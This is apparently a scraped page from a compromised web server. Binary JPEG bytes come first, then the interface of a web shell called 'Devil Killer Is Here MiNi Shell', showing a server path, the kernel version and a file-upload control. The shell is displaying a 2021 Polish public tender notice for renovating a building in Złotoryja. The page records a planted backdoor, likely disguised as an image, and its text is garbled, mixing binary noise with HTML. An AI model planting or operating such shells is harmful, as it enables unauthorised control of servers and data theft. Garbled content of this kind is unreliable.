JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211118/0027314401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont/ modernizacja „Pałacyku” nad zalewem” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Hala Sportowa przy Szkole Podstawowej nr 3</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 391071675</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wilcza, 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Złotoryja</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">hala@zlotoryja.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.hala.zlotoryja.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont/ modernizacja „Pałacyku” nad zalewem” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7ba4dff7-46cf-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00273144</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/zlotoryja <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/zlotoryja</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Do<br/>złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do do reprezentowania<br/>Wykonawcy ważnego kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu<br/>osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO”), Hala<br/>Sportowa przy Szkole Podstawowej nr 3 w Złotoryi informuje o zasadach przetwarzania danych<br/>osobowych oraz o przysługujących Państwu prawach z tym związanych:<br/>1. Administratorem Danych (AD) osobowych przetwarzanych jest Hala Sportowa przy Szkole<br/>Podstawowej nr 3 w Złotoryi ul. Wilcza 43 59-500 Złotoryja, reprezentowana przez Kierownika Hali<br/>Sportowej,<br/>2. W Urzędzie Miasta powołany jest Inspektor Ochrony Danych Osobowych (IOD),<br/>3. Jeśli mają Państwo pytania dot. sposobu przetwarzania danych osobowych, należy kontaktować się<br/>z IOD (dane teleadresowe: iod@zlotoryja.pl ),<br/>4. Państwa dane przetwarzane są na podstawie obowiązujących przepisów prawa, zawartych umów<br/>oraz na podstawie udzielonej zgody,<br/>Ogłoszenie nr 2021/BZP 00248610/01 z dnia 2021-10-28<br/>2021-10-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>5. Państwa dane przetwarzane są:<br/>a) w celu wypełnienia obowiązków prawnych ciążących na Hali Sportowej,<br/>b) w celu realizacji umów zawartych z kontrahentami Hali Sportowej,<br/>c) w oparciu o zgody na przetwarzanie danych osobowych.<br/>6. Odbiorcami Państwa danych mogą być:<br/>a) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie<br/>organów władzy publicznej, w zakresie i celach, które wynikają z przepisów powszechnie<br/>obowiązującego prawa,<br/>b) inne podmioty, które na podstawie stosownych umów podpisanych z AD przetwarzają dane dla<br/>których Administratorem Danych jest Hala Sportowa przy Szkole Podstawowej nr 3.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">H/2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Remont/ modernizacja „Pałacyku” nad zalewem”.<br/>CHARAKTERYSTYKA OBIEKTU<br/>Budynek wielofunkcyjny trzy poziomowy, położony w Złotoryi przy ulicy Sportowej 9, działka<br/>ewidencyjna nr 4 obręb Złotoryja 2. Ściany zewnętrzne murowane na zaprawie cementowo wapiennej, docieplone styropianem i otynkowane tynkiem akrylowym. Dach wielospadzisty<br/>pokryty gontem papowym.<br/>powierzchnia użytkowa - 323,70 m2 powierzchnia zabudowy - 126,90 m2 kubatura budynku -<br/>1216,00 m3 wysokość budynku - 12,95 m<br/>ZAKRES ZAMÓWIENIA OBEJMUJE PRACE:<br/>- remont tarasu, galerii i barierek - roboty rozbiórkowe , ziemne i murowe – pomieszczenia<br/>gospodarcze - wymiana stolarki okiennej i drzwiowej - ocieplenie budynku i roboty elewacyjne -<br/>wymiana obróbek blacharskich i uzupełnienia - wymiana parapetów – podokienników<br/>zewnętrznych z blachy ocynkowanej powlekanej - wymiana rynien i rur spustowych w 100% z<br/>PCV - wymiana podłóg i posadzek wewnątrz budynku - mycie dachu z mchu i konserwacja -<br/>częściowa wymiana podbitki okapowej wraz z zaimpregnowaniem - malowanie ścian i sufitów -<br/>montaż systemu monitoringu wizyjnego i alarmu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45262900-0 - Roboty balkonowe</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu to zdolności techniczne lub zawodowe. Zamawiająca uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności budowlano-konstrukcyjnej bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów oraz, że jest wpisany na listę właściwej Izby Inżynierów Budownictwa. Wykonawca może dysponować osobą, której odpowiednie kwalifikacje zawodowe, zdobyte w innych państwach, zostały uznane zgodnie z art. 12 a uPB na zasadach<br/>określonych w przepisach odrębnych, tj. m. in. ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: Zamawiający wzywa Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na dzień ich złożenia potwierdzających brak podstaw<br/>wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego:<br/>1. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zmawiającego w<br/>zakresie przesłanek, o których mowa w art. 108 ust. 1 oraz 109 ust. 1 pkt 7, 8 i 10 uPzp.<br/>2. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.<br/>3.potwierdzających spełnianie przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej i zawodowej<br/>4. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>Ogłoszenie nr 2021/BZP 00248610/01 z dnia 2021-10-28<br/>2021-10-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty;<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu Wykonawca<br/>ten bezpośrednio uczestniczył;<br/>Wzór wykazu stanowi Załącznik nr 4 do SWZ.<br/>5. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Wzór wykazu stanowi Załącznik nr 5 do SWZ.<br/>6. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w<br/>art. 118 uPzp, przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 3.1,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy<br/>wykluczenia z postępowania.<br/>7. W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia każdy z Wykonawców składa podmiotowe środki dowodowe,, dotyczące każdego z nich,<br/>potwierdzających, że nie zachodzą wobec nich podstawy wykluczenia z postępowania.<br/>8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>9. W przypadku złożenia dokumentów lub oświadczeń przez upoważnione podmioty jako dokument w<br/>postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>należycie zrealizował w okresie ostatnich 5 lat od dnia, w którym upływa termin składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną robotę budowlaną<br/>polegającą na remoncie balkonów, tarasów i termomodernizacji budynku na kwotę nie mniejsza niż<br/>100 000,00zł.<br/>dysponuje lub będzie dysponował następującą osobą skierowaną do realizacji zamówienia publicznego<br/>tj.:<br/>- osobą posiadającą prawo do pełnienia samodzielnych funkcji w budownictwie<br/>w odpowiedniej specjalności w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z<br/>2020 r. poz. 1333 ze zm.) zwaną uPB lub odpowiadające im uprawnienia wydane na podstawie<br/>wcześniejszych regulacji oraz ustawy 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (t.j. Dz.U. z 2019 r. poz. 1117), a w szczególności osobą posiadającą<br/>uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi:<br/>- kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności …konstrukcyjno-budowlane bez ograniczeń………….</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. Wykonawcy<br/>występujący wspólnie (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 uPzp zobowiązani<br/>są ustanowić pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie<br/>zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2.Dokument ten winien być opatrzony przez osobę/osoby uprawnioną(-e) do jego udzielenia tj.<br/>zgodnie z formą reprezentacji każdego z Wykonawców kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym. W przypadku wspólników<br/>spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i<br/>sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum. .<br/>3.W przypadku, gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym mocodawcy, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w<br/>Ogłoszenie nr 2021/BZP 00248610/01 z dnia 2021-10-28<br/>2021-10-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>postaci papierowej może dokonać również notariusz, stosownie do art. 97 § 2 ustawy z dnia 14<br/>lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym<br/>podpisem elektronicznym.<br/>4.Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z podmiotem<br/>występującym jako Pełnomocnik.<br/>5.Wykaz dokumentów składanych wraz z ofertą, w przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, został określony w rozdziale VII pkt 1 SWZ, a w<br/>przypadku podmiotowych środków dowodowych, składanych na wezwanie Zamawiającego,<br/>określa rozdział VII pkt 5 SWZ.<br/>OFERTA SKŁADA SIĘ Z:<br/>1) Formularza oferty sporządzonego według wzoru stanowiącego Załącznik nr 1 do SWZ;<br/>2) Oświadczenia, o którym mowa w art.125 ust. 1 uPzp (rozdział VII pkt 1 SWZ)<br/>3) Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy, o<br/>którym mowa w rozdziale VII pkt 2 SWZ (jeżeli dotyczy)<br/>4) W przypadku oferowania rozwiązań równoważnych Wykonawca składa przedmiotowe środki<br/>dowodowe, o których mowa w rozdziale IV pkt 23 SWZ, udowadniające, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia.<br/>5) Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>Wykonawcy dla osoby/osób podpisującej/cych ofertę zgodnie z pkt 7 rozdziału XI SWZ (jeżeli<br/>dotyczy).<br/>6) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w<br/>rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji<br/>(Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych informacji,<br/>przekazuje je w wydzielonym i odpowiednio oznaczonym pliku – szczegóły opisane w pkt 10<br/>rozdziału XI SWZ. (jeżeli dotyczy)<br/>Wraz z ofertą nie należy składać dokumentów wymienionych w rozdz. VII pkt 3 i następne.<br/>Dokumenty te składa Wykonawca, którego oferta została najwyżej oceniona, dopiero po<br/>otrzymaniu wezwania Zamawiającego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 